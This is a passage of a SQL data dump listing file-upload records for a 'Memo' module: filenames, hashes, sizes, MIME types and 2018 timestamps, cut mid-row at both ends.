14:28:55',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(255,NULL,'Memo','734ebf5f6e3b01a2b5861eb14a1edb9c','180823143042_734ebf5f6e3b01a2b5861eb14a1edb9c',32549,'image/png','aba0cd7e7e9192dd7eda42d8c1067d1a',12,1,'2018-08-23 14:30:42',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(256,NULL,'Memo','394f9caa30de3956723b7a808b2112f3','180823143247_394f9caa30de3956723b7a808b2112f3',54215,'image/png','9335882456c8ff0ba206a1632a0525a0',12,1,'2018-08-23 14:32:47',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(257,NULL,NULL,'注册.png','180823171717_4b5d146dddc3b5a50947a8c0c96cadf3.png',55649,'','c445d343d94ff98e036cec5333a692a0',0,1,'2018-08-23 17:17:17',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(258,NULL,'Memo','46a907deb3a431fcd8d78cef91b130f6','180824173446_46a907deb3a431fcd8d78cef91b130f6',66814,'image/jpeg','e0c39faa67fcaa727d58c2e0c14a0db3',1,1,'2018-08-24 17:34:46',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(259,NULL,'Memo','d96711aa19ae14d21fb43bd2fcfa5432','180824173535_d96711aa19ae14d21fb43bd2fcfa5432',41113,'image/jpeg','4b46e0637feb1590e85032f15f164612',19,1,'2018-08-24 17:35:35',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(260,NULL,'Memo','5696a38d5396d818258f0a6b07ada972','180824173605_5696a38d5396d818258f0a6b07ada972',38538,'image/jpeg','1f7f9afa98304711616ea513f1aea9d0',19,1,'2018-08-24 17:36:05',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(261,NULL,'Memo','b91f6cf20c32bbefdf6dbe830a819407','180824173641_b91f6cf20c32bbefdf6dbe830a819407',42708,'image/jpeg','91fc5ebd661f986f01be5abeb18540cf',19,1,'2018-08-24 17:36:41',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(262,NULL,'Memo','866870545dbf8725d33489762fa8375d','180824173716_866870545dbf8725d33489762fa8375d',31115,'image/jpeg','1de6d30f93d18233709e66711bd03947',19,1,'2018-08-24 17:37:16',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(263,NULL,'Memo','2598d0b72d0f10fd261947b63569776c','180824173746_2598d0b72d0f10fd261947b63569776c',39354,'image/jpeg','c15afd0f37923edd5f6fc1e3d3c3d0bd',19,1,'2018-08-24 17:37:46',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(264,NULL,'Memo','2b79f7617c7f03e92b4f0f682fdb8b0b','180824173827_2b79f7617c7f03e92b4f0f682fdb8b0b',42983,'image/jpeg','44ec68b496e8837e37c0d863d2a08556',19,1,'2018-08-24 17:38:27',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(265,NULL,'Memo','5c0e6759191b4afe7b3ea4031f3e2c36','180824173857_5c0e6759191b4afe7b3ea4031f3e2c36',51574,'image/jpeg','b62118ccff431419b14c461f06565721',24,1,'2018-08-24 17:38:57',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(266,143,'Memo','微信图片_20180824173428.jpg','180824174036_11156d14b69f249e31ba04e9d77802a4.jpg',201054,'image/jpeg','a9ed2c573ab05cb7c8a1cf59f540e8bb',285,1,'2018-08-24 17:40:36',NULL,'2018/08',1,1,NULL,NULL,1,NULL,1,0,NULL),(267,NULL,'Memo','4076005eba656294cf0397ad2ac63986','180824174138_4076005eba656294cf0397ad2ac63986',201054,'image/jpeg','a9ed2c573ab05cb7c8a1cf59f540e8bb',19,1,'2018-08-24 17:41:38',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(271,NULL,'Memo','e4abd8174cd19ce6721ab30d052344d2','180827113513_e4abd8174cd19ce6721ab30d052344d2',12430,'image/jpeg','93c286b1123b8427b41d4d9ed13f2379',1,1,'2018-08-27 11:35:13',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(272,NULL,'Memo','c518b4f0f35b76363307dfb7fa57178d','180827113541_c518b4f0f35b76363307dfb7fa57178d',101666,'image/png','4830493c581c04773725deaca033b318',0,1,'2018-08-27 11:35:41',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(277,NULL,'Memo','a287bc376e07f9f9dec88359bd5b5b4c','180830105617_a287bc376e07f9f9dec88359bd5b5b4c',179616,'image/jpeg','f398ee53b50bc029f1df998800beca20',13,1,'2018-08-30 10:56:17',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(278,NULL,'Memo','1f8a918e1d967bf3984502ca37da7755','180830105802_1f8a918e1d967bf3984502ca37da7755',179739,'image/jpeg','85504c69c0802d49dc28917299c01675',26,1,'2018-08-30 10:58:02',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(281,NULL,'Memo','ffb18bff1c699796a62377a37460dba2','180830151152_ffb18bff1c699796a62377a37460dba2',26890,'image/jpeg','dd2dc9aadb3a5fa627b96138bed10db4',10,1,'2018-08-30 15:11:52',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(282,NULL,'Memo','3c51cc45dce7433e95e8054d3656c441','180830151317_3c51cc45dce7433e95e8054d3656c441',27305,'image/jpeg','178ecb283591d37a3fb26974d8e3b0f4',10,1,'2018-08-30 15:13:17',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(283,NULL,'Memo','6f2c0050e1e341ffa3f310455bc5349e','180830151341_6f2c0050e1e341ffa3f310455bc5349e',50383,'image/jpeg','67a568d9e9ffcbc1bf3e511880f5f44f',10,1,'2018-08-30 15:13:41',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(284,NULL,'Memo','07c1b9695ea5061342ee1e8cc088e122','180830151439_07c1b9695ea5061342ee1e8cc088e122',14814,'image/jpeg','9bd441094bd4f3f09d363e94cee2ecc8',10,1,'2018-08-30 15:14:39',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(285,NULL,'Memo','f75fc160e2763c7a0ed969c1fef20f78','180830151537_f75fc160e2763c7a0ed969c1fef20f78',19721,'image/jpeg','dc4b51c24464da98b5226d0e4605e756',10,1,'2018-08-30 15:15:37',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(286,NULL,'Memo','52a65af69142ba0642a3592e65ef0690','180830151644_52a65af69142ba0642a3592e65ef0690',38022,'image/jpeg','5ee404180fff9c36ebfd712601c0abb2',10,1,'2018-08-30 15:16:44',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(287,NULL,'Memo','5c74d204c9527bdc94598d0a37ac8ef1','180830151744_5c74d204c9527bdc94598d0a37ac8ef1',35431,'image/jpeg','485ef9c082940e9783f224358cf56429',10,1,'2018-08-30 15:17:44',NULL,'2018/08',1,1,NULL,NULL,1,NULL,0,0,NULL),(289,NULL,'Memo','f8496fc837c9a65207ad258aec7dd928','180903112435_f8496fc837c9a65207ad258aec7dd928',178147,'image/jpeg','4b0dbc02aa6fcf7c819eb15d7010c705',1,1,'2018-09-03 11:24:35',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(291,NULL,'Memo','6e088a365b3b54da34b0fa4e26685844','180903112657_6e088a365b3b54da34b0fa4e26685844',178177,'image/jpeg','8c924b2f8d412107850f6151cbbd9555',1,1,'2018-09-03 11:26:57',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(292,NULL,'Memo','7dd1689450abc254af6817dd8d25ca25','180903113813_7dd1689450abc254af6817dd8d25ca25',178147,'image/jpeg','4b0dbc02aa6fcf7c819eb15d7010c705',11,1,'2018-09-03 11:38:13',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(293,NULL,'Memo','71ebe3f8d0c196c0804f3bd6c8eb56e2','180903113853_71ebe3f8d0c196c0804f3bd6c8eb56e2',176307,'image/jpeg','bb78c45bbf556a02dcd7637fab6f8007',20,1,'2018-09-03 11:38:53',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(300,NULL,NULL,'图2.jpg','180905143512_9b5f4c5431bcfe8f6194f9cbffb010c4.jpg',8313,'','d12209c8488dc1fa291a06b801fe19b9',0,1,'2018-09-05 14:35:12',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(301,NULL,NULL,'图1.jpg','180905161340_b29f126069b56020d0a484e767002d11.jpg',8313,'image/jpeg','d12209c8488dc1fa291a06b801fe19b9',0,1,'2018-09-05 16:13:40',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(302,NULL,NULL,'_5G_ILBDFCK$L[1NVH_[4L9.png','180909102005_85023476afc9e98ca9760b709a635048.png',1275,'image/png','b23ab2720ef17e10a3d3e4474cd66916',0,1,'2018-09-09 10:20:05',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(311,NULL,NULL,'图1.jpg','180910093407_b29f126069b56020d0a484e767002d11.jpg',8313,'','d12209c8488dc1fa291a06b801fe19b9',0,1,'2018-09-10 09:34:07',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(314,NULL,'Memo','14acc3c0a01fb676946c5dc2e8333a8f','180914113845_14acc3c0a01fb676946c5dc2e8333a8f',849455,'image/jpeg','c1c6ac18b2b00caecaba6d382089e579',17,1,'2018-09-14 11:38:45',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(315,NULL,'Memo','90f271b242d8e6e3b4d498bcfe1a6974','180914113908_90f271b242d8e6e3b4d498bcfe1a6974',772741,'image/jpeg','f0e5dc3a04277011943fe2e385cfcdb7',17,1,'2018-09-14 11:39:08',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(316,NULL,'Memo','a71993145072c05afad79140e0d4aae6','180914114053_a71993145072c05afad79140e0d4aae6',1299918,'image/jpeg','2d1edbdb0934fb6b8bcea0701b28f57e',17,1,'2018-09-14 11:40:53',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(317,NULL,'Memo','c8b91ff7b6e2949e12bc17a1a7dfc0b5','180914114126_c8b91ff7b6e2949e12bc17a1a7dfc0b5',1559545,'image/jpeg','bbc6b259172f806293299e8f8b99441b',17,1,'2018-09-14 11:41:26',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(318,NULL,'Memo','a5b673415cb1794a3a125dbac8d5ec8a','180914114156_a5b673415cb1794a3a125dbac8d5ec8a',1430272,'image/jpeg','ae0ec3323db5443e447a772a3ae35776',16,1,'2018-09-14 11:41:56',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(319,NULL,'Memo','b5af27b47fa028b34bb6ca29dc635a18','180914114239_b5af27b47fa028b34bb6ca29dc635a18',2589604,'image/jpeg','452984317e73faa5ae9f6ab50bb69c1e',17,1,'2018-09-14 11:42:39',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(320,NULL,'Memo','d13276801bb2b3b39fdbb3442701a8f6','180914114313_d13276801bb2b3b39fdbb3442701a8f6',1119888,'image/jpeg','f6a9e5d128fc40cd6885dd702aaffa46',16,1,'2018-09-14 11:43:13',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(321,NULL,'Memo','7f583ddf063800d7c44c8efba6cb23c5','180914114350_7f583ddf063800d7c44c8efba6cb23c5',1262569,'image/jpeg','6af0a8ea25d9cabfc6bbceae721d5896',18,1,'2018-09-14 11:43:50',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(322,NULL,'Memo','7dadab89a5f0e736c0f677c897bb4e95','180914114416_7dadab89a5f0e736c0f677c897bb4e95',1515582,'image/jpeg','641cc9540b0f9e42128212b1f13e9b77',16,1,'2018-09-14 11:44:16',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(323,NULL,'Memo','f6b6a4ebd84e0f99d49c0d7b72c47d72','180914114443_f6b6a4ebd84e0f99d49c0d7b72c47d72',1371561,'image/jpeg','a9859c088bf94c153718f92f8760d412',16,1,'2018-09-14 11:44:43',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(324,NULL,'Memo','b65a7e6cec519a64014fc6995f9fdeeb','180914114522_b65a7e6cec519a64014fc6995f9fdeeb',2044868,'image/jpeg','3e01869d6e00165c908324a1a318782e',15,1,'2018-09-14 11:45:22',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(325,NULL,'Memo','22afd89b3cd8dcfb18317b4c1c4ad973','180914114551_22afd89b3cd8dcfb18317b4c1c4ad973',1126648,'image/jpeg','645e09a5f53894d08ddb5241214992d1',14,1,'2018-09-14 11:45:51',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(326,NULL,'Memo','bab2256f82dfef6893c61491025e5833','180914114613_bab2256f82dfef6893c61491025e5833',1035106,'image/jpeg','a2859810cdfa41a18c02f34f6566f53c',14,1,'2018-09-14 11:46:13',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(327,NULL,'Memo','36c525753caeb662019512dcca906dd5','180914114627_36c525753caeb662019512dcca906dd5',190003,'image/jpeg','598f34f1296d74986c5245ba9c238fc6',15,1,'2018-09-14 11:46:27',NULL,'2018/09',1,1,NULL,NULL,1,NULL,0,0,NULL),(330,NULL,'Memo','e271288628cc9629c08c1c8af2a875b1','181011104949_e271288628cc9629c08c1c8af2a875b1',94424,'image/png','67c2f559d95ce359be712fd9b6a6c24f',1,1,'2018-10-11 10:49:49',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(332,NULL,'Memo','ac95970c3e72cc9c2431654fd1bcbcff','181011105534_ac95970c3e72cc9c2431654fd1bcbcff',90772,'image/png','03ed38e595290b0d334aaf09b8863d7c',7,1,'2018-10-11 10:55:34',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(333,NULL,'Memo','e1a89a0cc5dd0743f9b3b654590e2209','181011105834_e1a89a0cc5dd0743f9b3b654590e2209',94424,'image/png','67c2f559d95ce359be712fd9b6a6c24f',6,1,'2018-10-11 10:58:34',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(340,NULL,'Memo','94471d0e0bc1a9276dc8e4b280f467e2','181025091514_94471d0e0bc1a9276dc8e4b280f467e2',94442,'image/jpeg','3508a60208a3c15b63aa26160d6164ed',12,1,'2018-10-25 09:15:14',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(342,NULL,'Memo','5266875c9a062cde9ecec58f58ca4ec5','181025091918_5266875c9a062cde9ecec58f58ca4ec5',3316,'image/jpeg','23262ca551466330ee3713690e28a812',1,1,'2018-10-25 09:19:18',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(343,NULL,'Memo','8d66a7d8aa9a4050ab262dbe15aabd70','181025092057_8d66a7d8aa9a4050ab262dbe15aabd70',33516,'image/png','b072ed436a0359503ec997f296348ebc',7,1,'2018-10-25 09:20:57',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(345,NULL,'Memo','b4c57ad44ad7e949dbc74cca30061837','181025111252_b4c57ad44ad7e949dbc74cca30061837',47934,'image/jpeg','ad83acae417afe7fc747d5c48ca42337',12,1,'2018-10-25 11:12:52',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(346,NULL,'Memo','476b1a475f6fe4c1e45314ca02e4cc5a','181025111335_476b1a475f6fe4c1e45314ca02e4cc5a',35598,'image/jpeg','add0fb59ecebf3503756072091e78e73',12,1,'2018-10-25 11:13:35',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(347,NULL,'Memo','9229c9f24fc238f3e338705ec32401fa','181025111426_9229c9f24fc238f3e338705ec32401fa',74110,'image/jpeg','d34d07bc6e224bc336f23a1e37f674b4',12,1,'2018-10-25 11:14:26',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(348,NULL,'Memo','cbf88039c280a11f3055d03b38a2c520','181025111519_cbf88039c280a11f3055d03b38a2c520',58887,'image/jpeg','ad26c02bd496550c7153f33d7e1b522a',12,1,'2018-10-25 11:15:19',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(349,NULL,'Memo','c65d9d109401c252794f291c281f3ea4','181025111630_c65d9d109401c252794f291c281f3ea4',60025,'image/jpeg','87fd374bdf87c373cd93608a2113e82e',12,1,'2018-10-25 11:16:30',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(350,NULL,'Memo','852a39acdc6f6ab9bb0ff45769ab11e9','181025111724_852a39acdc6f6ab9bb0ff45769ab11e9',47090,'image/jpeg','c8525768c8c2094a2cad72dab7457cfb',12,1,'2018-10-25 11:17:24',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(351,NULL,'Memo','1d1ed2eb92a61d0f77e1bed35c10a185','181025111810_1d1ed2eb92a61d0f77e1bed35c10a185',45860,'image/jpeg','6ea0b4395a8d55bf00acc6be207f180c',12,1,'2018-10-25 11:18:10',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(352,NULL,'Memo','964b4744b019d1164c4fcefbb330ba2b','181025111901_964b4744b019d1164c4fcefbb330ba2b',90674,'image/jpeg','a7e8b3a772c041806a788520e349c6f0',12,1,'2018-10-25 11:19:01',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(353,NULL,'Memo','288d1716a0cffbd6057412a495c64d86','181025111926_288d1716a0cffbd6057412a495c64d86',70162,'image/jpeg','2a4e51fd817f23ae96a7bb8d01db38c5',12,1,'2018-10-25 11:19:26',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(355,NULL,'Memo','f29a3e8dcb768537dc85accd8876c3d6','181026104148_f29a3e8dcb768537dc85accd8876c3d6',37128,'image/jpeg','da0e678c437a5976483d192f6c4ade06',17,1,'2018-10-26 10:41:48',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(356,NULL,'Memo','b1394c0d2d2cb80d4185d8c8163f1c5a','181026104241_b1394c0d2d2cb80d4185d8c8163f1c5a',22272,'image/jpeg','8312abcf1ac5cc30be9704cfc0a5ae6a',17,1,'2018-10-26 10:42:41',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(357,NULL,'Memo','c30cd05797890ac01f1210221993afac','181026104330_c30cd05797890ac01f1210221993afac',26881,'image/jpeg','f953996a6f381a968ebe16b439202797',17,1,'2018-10-26 10:43:30',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(358,NULL,'Memo','44c846aaab89e258244b26c363a13711','181026104416_44c846aaab89e258244b26c363a13711',27848,'image/jpeg','47d1007b697563b4f537f76fff1f2198',17,1,'2018-10-26 10:44:16',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(359,NULL,'Memo','8ed59d3610b494652c79955af902e2a6','181026104517_8ed59d3610b494652c79955af902e2a6',19289,'image/jpeg','eb1069218a33ade06320bd9087227873',17,1,'2018-10-26 10:45:17',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(360,NULL,'Memo','ba888b2f2cc3c40f7ce5bee1c90e1ceb','181026104604_ba888b2f2cc3c40f7ce5bee1c90e1ceb',22613,'image/jpeg','2ce62bcaad30080cfdc2aa4b8a060cf8',17,1,'2018-10-26 10:46:04',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(361,NULL,'Memo','c7a906229f5c481c9126672673461bc2','181026104657_c7a906229f5c481c9126672673461bc2',44807,'image/jpeg','22c46b006f6d0642492551f72664efe4',17,1,'2018-10-26 10:46:57',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(362,NULL,'Memo','d699fd9ff387498f5df955b6b708e322','181026104756_d699fd9ff387498f5df955b6b708e322',62461,'image/jpeg','55f105875d25b38b0bf40cd807c4ff9e',17,1,'2018-10-26 10:47:56',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(364,NULL,'Memo','de61a887936fa805827077973154ec87','181026105118_de61a887936fa805827077973154ec87',24754,'image/jpeg','680547b31bbfd9747f3126e5fe63be5a',15,1,'2018-10-26 10:51:18',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(366,NULL,'Memo','a915e38b0c91ca9a643a14957026c8d3','181026105914_a915e38b0c91ca9a643a14957026c8d3',20722,'image/jpeg','2a879762b1e5e856f065ffffe24a0e84',29,1,'2018-10-26 10:59:14',NULL,'2018/10',1,1,NULL,NULL,1,NULL,0,0,NULL),(370,NULL,'Memo','1e7386ab651102fbaa9719a922660d08','181105152838_1e7386ab651102fbaa9719a922660d08',20700,'image/jpeg','ada97860e4c6ee1341bd0817dc2c5596',20,1,'2018-11-05 15:28:38',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(371,160,'Memo','微信图片_20181105152604.jpg','181105152908_158ca5c429f38c22619001fd410b631b.jpg',20700,'image/jpeg','ada97860e4c6ee1341bd0817dc2c5596',610,1,'2018-11-05 15:29:08',NULL,'2018/11',1,1,NULL,NULL,1,NULL,1,0,NULL),(372,NULL,'Memo','41f86cf3c0651a9c56ba24eadf10b104','181114143435_41f86cf3c0651a9c56ba24eadf10b104',6774,'image/jpeg','58f13877b9a51c05e05681d419607279',1,1,'2018-11-14 14:34:35',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(373,NULL,'Memo','c7d4df43dc332e5477eabed93b6cdae9','181114143446_c7d4df43dc332e5477eabed93b6cdae9',11539,'image/jpeg','308132aba84bd4a2c8b1320aad410fc2',1,1,'2018-11-14 14:34:46',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(374,NULL,'Memo','815b7936a8dc7b1c0967af4d83e10a97','181114143544_815b7936a8dc7b1c0967af4d83e10a97',8733,'image/jpeg','20fa5cdcff4bd0ff70e22cd53d6ea0ab',1,1,'2018-11-14 14:35:44',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(375,NULL,'Memo','0e315d7b1185e5740c3c8987f233d9fa','181114143654_0e315d7b1185e5740c3c8987f233d9fa',117602,'image/jpeg','f6c99119a905f11c3a22f012c1bcc6eb',1,1,'2018-11-14 14:36:54',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(376,NULL,'Memo','b738e6c736eaa3c32e64e74b648dfb8f','181114143713_b738e6c736eaa3c32e64e74b648dfb8f',77536,'image/jpeg','960053b631af6dcecc46e781576e4cca',1,1,'2018-11-14 14:37:13',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(377,NULL,'Memo','b1a06d1b9cb6f257c90c02079ae32b7d','181114144043_b1a06d1b9cb6f257c90c02079ae32b7d',6774,'image/jpeg','58f13877b9a51c05e05681d419607279',20,1,'2018-11-14 14:40:43',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(378,NULL,'Memo','cde71f841b1a3a4cd2ff4cd0db619bb3','181114144052_cde71f841b1a3a4cd2ff4cd0db619bb3',11539,'image/jpeg','308132aba84bd4a2c8b1320aad410fc2',27,1,'2018-11-14 14:40:52',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(379,NULL,'Memo','6eda7b4a65a4571caf8ff299d736dbc9','181114144123_6eda7b4a65a4571caf8ff299d736dbc9',8733,'image/jpeg','20fa5cdcff4bd0ff70e22cd53d6ea0ab',24,1,'2018-11-14 14:41:23',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(380,NULL,'Memo','3e6effce62bf88a00a312335f659d795','181114144200_3e6effce62bf88a00a312335f659d795',117602,'image/jpeg','f6c99119a905f11c3a22f012c1bcc6eb',20,1,'2018-11-14 14:42:00',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(381,NULL,'Memo','bbc295a200ffa2e2d7e376828fbb2208','181114144214_bbc295a200ffa2e2d7e376828fbb2208',77536,'image/jpeg','960053b631af6dcecc46e781576e4cca',23,1,'2018-11-14 14:42:14',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(383,NULL,'Memo','58c6626397fc3cdc53d272db60ead82c','181119100114_58c6626397fc3cdc53d272db60ead82c',134318,'image/jpeg','b14665610762d7e53af449bb03f847c4',8,1,'2018-11-19 10:01:14',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(386,NULL,'Memo','8c92f4c47df59bdee24a0f7833919416','181129142429_8c92f4c47df59bdee24a0f7833919416',17492,'image/jpeg','12de2a7454e9394c1b8413ed51dede37',9,1,'2018-11-29 14:24:29',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(387,NULL,'Memo','2e416a9432225abf58b816f25c586c1f','181129142510_2e416a9432225abf58b816f25c586c1f',17919,'image/jpeg','29af3af2223b80f134f73c1470a68f9f',9,1,'2018-11-29 14:25:10',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(388,NULL,'Memo','de87733db052429ae74bb9f08f48eff4','181129142548_de87733db052429ae74bb9f08f48eff4',17657,'image/jpeg','3caefafbb62ebad9e49b0c73cd15093b',10,1,'2018-11-29 14:25:48',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(389,NULL,'Memo','532b77053e8772dc0db4c430a3b7b777','181129142612_532b77053e8772dc0db4c430a3b7b777',17657,'image/jpeg','3caefafbb62ebad9e49b0c73cd15093b',0,1,'2018-11-29 14:26:12',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(390,NULL,'Memo','d752723606ce299cb58f1933752e9686','181129142644_d752723606ce299cb58f1933752e9686',16549,'image/jpeg','2b40a35179fd23ed2ef76dbdef79694a',9,1,'2018-11-29 14:26:44',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(391,NULL,'Memo','62adca23f3908530e4ac9eb9f40dd122','181129142837_62adca23f3908530e4ac9eb9f40dd122',13598,'image/jpeg','2d7f972b681bc9d44ddfae842e746e7e',9,1,'2018-11-29 14:28:37',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(392,NULL,'Memo','339b29324e453636b150a5ce65a3bde4','181129142914_339b29324e453636b150a5ce65a3bde4',17681,'image/jpeg','658f2af8457cf1ccfbaac819f25f8d70',9,1,'2018-11-29 14:29:14',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(393,NULL,'Memo','c58a543c05082ba86512877e512c1386','181129142938_c58a543c05082ba86512877e512c1386',19054,'image/jpeg','143f64770d1f3dfe8ede29f93295a815',9,1,'2018-11-29 14:29:38',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(394,NULL,'Memo','1024aa5b331b7139fe9885ba6d14b574','181129143028_1024aa5b331b7139fe9885ba6d14b574',22949,'image/jpeg','b1b42c28a60d9bc72d3f00fce0633c83',9,1,'2018-11-29 14:30:28',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(395,NULL,'Memo','6ac10db6d947053eaab450ea8afec28c','181129143058_6ac10db6d947053eaab450ea8afec28c',31216,'image/jpeg','4458181adc76b774d35d27e274f23700',9,1,'2018-11-29 14:30:58',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(396,NULL,'Memo','8bf7fce743fe8adcbfab5a7abb600e3c','181129143129_8bf7fce743fe8adcbfab5a7abb600e3c',22848,'image/jpeg','aca9513bff49595d88c191e7582f08d8',11,1,'2018-11-29 14:31:29',NULL,'2018/11',1,1,NULL,NULL,1,NULL,0,0,NULL),(398,NULL,'Memo','11a7abfb59529c34201271f6605cf4f1','181226153115_11a7abfb59529c34201271f6605cf4f1',30560,'image/jpeg','55c35a2dcc02f905b0164bd095883af0',23,1,'2018-12-26 15:31:15',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(399,NULL,'Memo','e7ea8486c4868baf293cd9ee6f9cea7f','181226153204_e7ea8486c4868baf293cd9ee6f9cea7f',22571,'image/jpeg','efa36ac3e132a0807ff28c22690eef29',22,1,'2018-12-26 15:32:04',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(400,NULL,'Memo','0172bb7b7029a82191c83c0094a02bee','181226153321_0172bb7b7029a82191c83c0094a02bee',131532,'image/jpeg','8f474ed46db3c22346b338badb41a632',22,1,'2018-12-26 15:33:21',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(401,NULL,'Memo','359a5711d66745aa2ff0dab90381e4e7','181226153354_359a5711d66745aa2ff0dab90381e4e7',35012,'image/jpeg','7837277c860a523083d1bfb7c475801d',21,1,'2018-12-26 15:33:54',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(402,NULL,'Memo','ec1cba9e86b09d3ba34667e66aa7889f','181226153420_ec1cba9e86b09d3ba34667e66aa7889f',45435,'image/jpeg','5afacef71dc3bd15b0896c05d6f7574b',21,1,'2018-12-26 15:34:20',NULL,'2018/12',1,1,NULL,NULL,1,NULL,0,0,NULL),(403,167,'Memo','微信图片_20181226153100.jpg','181226153511_7bfe44a93f88d06b34c2f7178b3c13d4.jpg',30560,'image/jpeg','55c35a2dcc02f905b0164bd095883af0',389,1,'2018-12-26 